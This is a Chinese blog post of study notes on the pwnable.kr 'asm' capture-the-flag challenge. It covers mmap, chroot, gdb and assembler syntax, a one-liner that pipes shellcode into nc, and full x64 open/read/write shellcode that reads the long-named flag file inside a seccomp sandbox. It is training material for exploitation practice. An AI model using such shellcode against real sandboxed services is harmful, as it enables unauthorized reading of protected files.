pwnable.k asm 知识点总结

最新推荐文章于 2022-07-10 01:16:12 发布
最新推荐文章于 2022-07-10 01:16:12 发布
阅读量324 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/93635698
版权

1.mmap 创建新的内存虚拟区域

void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);

start: 新的虚拟内存区域最好是从start 开始的一个区域

length: 连续的对象片的大小为length 字节

offset:从据文件开始处偏移量为offset字节的地方开始

prot:包含描述新映射的虚拟内存区域的访问权限位(即在相应区域节后中的vm_prot位)
1.PROT_EXEC这个区域内的页面有可以被CPU执行的指令组成
2.PROT_READ:这个区域的页面可读
3.PROT_WRITE:这个区域内的页面可写
4.PROT_NONO:这个区域的页面不能被访问

flags:由描述被映射对象类型的位组成。如果设置了MAP_ANON标记位,那么被映射的对象就是一个匿名对象,而相应的虚拟页面是请求二进制零的。
MAP_PRIVATE表示被映射的对象是一个私有的、写时复制的对象,而MAP_SHARED表示时一个共享对象

off_set:SUSv3 规定mmap() 的offset参数必须要与分页对齐,而addr(start)参数在指定了MAP_FIXED情况下也必须要与分页对齐。如果指定了MAP_FIXED并且addr为非零值,那么addroffset 除以系统分页大小所得的余数应该
相等

匿名文件映射:匿名映射时没有对应文件的一种映射在flags中指定MAP_ANONYMOUS 并将fd 指定为-1

fd和offset 是用于文件映射的,匿名映射将忽略它们

  1. chroot
    每个进程都有一个根目录,该目录是解释绝对路径(即哪些以/开始的目录)时的起点,默认情况下,这是文件系统的真是目录。(新进程从其父进程处继承根目录。)有些场合需要改变一个进程的根目录,而特权级(CAP_SYS_CHROOT)进程通过chroot()系统调用能够做到这一点。
#define _BSD_SOURCE
#include <unistd.h>
int chroot(const char *pathname);

chroot()系统调用将进程的根目录改为由pathname指定的目录(如果pathname时符号链接,还将对其解引用)。自此,对所有绝对路径名的解释都将以该文件系统的这一位置作为起点。鉴于这会将应用程序限定于文件系统的特定区域,有时也将此称为设立了一个chroot监禁区。

  1. (gdb) x/gx $rsp
    gx 待变数值用64位16进制显示

4.汇编指令中equ 指令 相当于C语言的#define
例如:
COUNT EQU 100;令COUNT的值为100,存储器中为变量分配 0个字节
COUNT DB 100 ;令COUNT的值为100,存储器中为变量分配 1个字节
COUNT DW 100 ;令COUNT的值为100,存储器中为变量分配 2个字节

5.$ 在汇编指令中代表当前地址
count EQU $-ARRA 定义了一个常量,不占用内存单元,代码段中使用它,等价于使用一个立即数。

6.python -c 'print “shellcode…”.decode(“hex”) ’ | nc 0 9026

7.提取pwntools生成的64位open,read,write 系统调用汇编代码

section .text
	global main
main:
/* push 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very
_looooooooooooooooooooooooooooo
ooooooooooooooooooooooooooooooo
oooooooooooooooo00000000000000000000000
00ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x676e6f306f306f
    xor [rsp], rax
    mov rax, 0x306f306f306f306f
    push rax
    mov rax, 0x3030303030303030
    push rax
    mov rax, 0x303030306f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f3030303030
    push rax
    mov rax, 0x3030303030303030
    push rax
    mov rax, 0x3030303030303030
    push rax
    mov rax, 0x303030306f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6c5f797265765f73
    push rax
    mov rax, 0x695f656d616e5f65
    push rax
    mov rax, 0x6c69665f6568745f
    push rax
    mov rax, 0x7972726f732e656c
    push rax
    mov rax, 0x69665f736968745f
    push rax
    mov rax, 0x646165725f657361
    push rax
    mov rax, 0x656c705f656c6966
    push rax
    mov rax, 0x5f67616c665f726b
    push rax
    mov rax, 0x2e656c62616e7770
    push rax
    mov rax, 0x5f73695f73696874
    push rax
open:
	/* open(file='rsp', oflag=0, mode=0)*/ 
	mov rdi, rsp  
    xor edx, edx
    xor esi, esi
    push SYS_open
    pop rax    
    syscall
    
read:
   /*call read('rax', 'rsp', 100)*/ 
    mov rdi, rax
    xor eax, eax /* SYS_read */
    push 0x64
    pop rdx
    mov rsi, rsp
    syscall

write:
    /* write(fd=1, buf='rsp', n=100) */
    push 1
    pop rdi
    push 0x64
    pop rdx
    mov rsi, rsp
    /* call write() */
    push SYS_write /* 1 */
    pop rax
    syscall
苍崎青子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.kr】 asm seccomp sadbox & 64位shellcode 读 flag
think_ycx的专栏
11-22 709
题目信息 nc之后查看信息如下。根据readme提示,本关是要求登陆服务器后,nc 9026端口连接asm程序来读flag。flag文件名很长。 看了源码发现程序做了如下操作。mmap了一块内存读取shellcode并执行,开启了seccomp沙箱[1],限制只能使用open read write exit exit_group系统调用。因此本关就是利用这些系统调用来写64位下读fla...
pwnable_asm
z1r0的博客
03-16 251
pwnable_asm 查看保护 orw来读flag就可以了,程序在0x41414000这里创建了0x1000大小的空间,我们可以将flag拿到这里然后 输出即可。 orw其实就是open read write open(file=‘flag’, oflag=0, mode=0); read(3, 0x41414000, 0x100) write(fd=1, buf=0x41414000, n=0x100) 意思就是打开flag,读取flag到0x41414000,从0x41414000中读取数据到屏幕
pwnable-asm
网安星空
02-09 1431
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是asm,主要考察的是shellcode的使用。
BUUCTF Pwn pwnable_asm
ChaoYue_miku的博客
07-10 347
64位ELF 开启了沙箱,允许使用open()、read()、write()三个函数。  主要逻辑基本都在main函数当中,首先用函数映射出一块内存空间,起始地址为,大小为。  flag文件位于相同根目录下,可以利用这一函数试探文件名既具体位置。 核心思想是利用首先利用函数打开flag,然后利用函数将flag读入刚才映射好的内存空间中,最后利用函数写flag到屏幕上即可。根据刚才的分析,可以编写如下的 0x03 运行exp 本地调试好之后,远程连接靶场,运行flag{7be081e2-506e-423
pwnable.kr 之asm
Bill
04-30 2108
一个真正的高手应该学会写shellcode. 首先查看c代码:#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h>#defin
cglib-2.2.jar asm-tree.jar asm-commons.jar asm.jar
06-27
cglib动态代理模式jar包 cglib-2.2.jar asm-tree.jar asm-commons.jar asm.jar
lcd.asm.rar_lcd.asm
09-21
液晶显示屏应用源程序
QD73BV.asm.rar_.asm
09-24
这是另一快最好的自动两衣服的遥控设备电路程序,采用汇编语言编写。
com.springsource.org.objectweb.asm-3.2.0.jar
10-23
严重: Exception sending context initialized event to listener instance ... nested exception is java.lang.NoClassDefFoundError: org/objectweb/asm/Type ssh 框架的java web项目部署到tomcat报上面错误 添加此包
E158255MatrixKey.asm.asm.asm
最新发布
12-19
E158255MatrixKey.asm.asm.asm
pwnableasm
pwd_3的博客
09-27 636
问题描述Welcome to shellcoding practice challenge. In this challenge, you can run your x64 shellcode under SECCOMP sandbox. Try to make shellcode that spits flag using open()/read()/write() systemcalls onl
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 543
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
pwnable.kr [asm]
shisuan1的博客
12-26 364
pwnable.kr [asm] #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;seccomp.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;fcntl.h&g
asm - pwnable
SkYe's Blog
09-20 262
asm - pwnable 题目 Mommy! I think I know how to make shellcodes ssh asm@pwnable.kr -p2222 (pw: guest) readme文件给出提示: once you connect to port 9026, the "asm" binary will be executed under asm_pwn privi...
linux编程的108种奇淫巧计-15(减少复制)
pennyliang的专栏
01-18 7256
计算机的存储结构是层次性的,从快到慢,代价从高到低,容量从小到大,寄存器,L1 cache,L2 cache,直到磁盘,甚至比磁盘更慢速的磁带机,因此在程序运行时,不可避免的会有复制,这一点很重要,从优化的角度看,很多时候都是为了减少复制的代价,比如如果已知磁盘的读写是顺序的,这样采用DIRECTIO是较好的,直接读到用户内存上,而不需要先读到内核内存上,然后再复制到用户内存,这个例子我打算在未来
pwnable.kr】 asm
子曰小玖的博客
06-05 262
https://www.cnblogs.com/p4nda/p/7169456.html 一道写shellcode的题目, #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #...
pwnable.kr asm (open函数的探究)
BengDouLove的博客
04-06 439
这其实是一道挺简单的题,会用pwntools写shellcode就行了,不过里面有一个小点,网上别的文章从没有人提过,前两天学校有人讲座讲了这道题,然后也讲错了。。。不求甚解也得看情况。。 连上去,然后ls发现有这么几个文件,, 这是asm.c #include <stdio.h> #include <string.h> #include <stdlib.h>...
pwnable.kr asm
r250414958的博客
12-08 248
看样子是一道和shellcode有关的题目 连上去看看 目录下好像有个说明的文件查看一下 大概意思就是连接到9026端口 asm再特权下执行并get flag 那我们先看一下asm.c #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h>...
ASMASM基础知识
coco3600的博客
06-25 1690
ASMASM基础知识 市场占有率 ASM自动存储管理技术已经面世10多个年头,目前已经广泛使用于各个领域...
classnotfoundexception: org.objectweb.asm.type
07-15
`ClassNotFoundException: org.objectweb.asm.Type` 是一个Java异常,表示无法找到名为 `org.objectweb.asm.Type` 的类。ASM是一个用于动态生成和修改Java字节码的工具库,`org.objectweb.asm.Type` 是ASM库中的一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值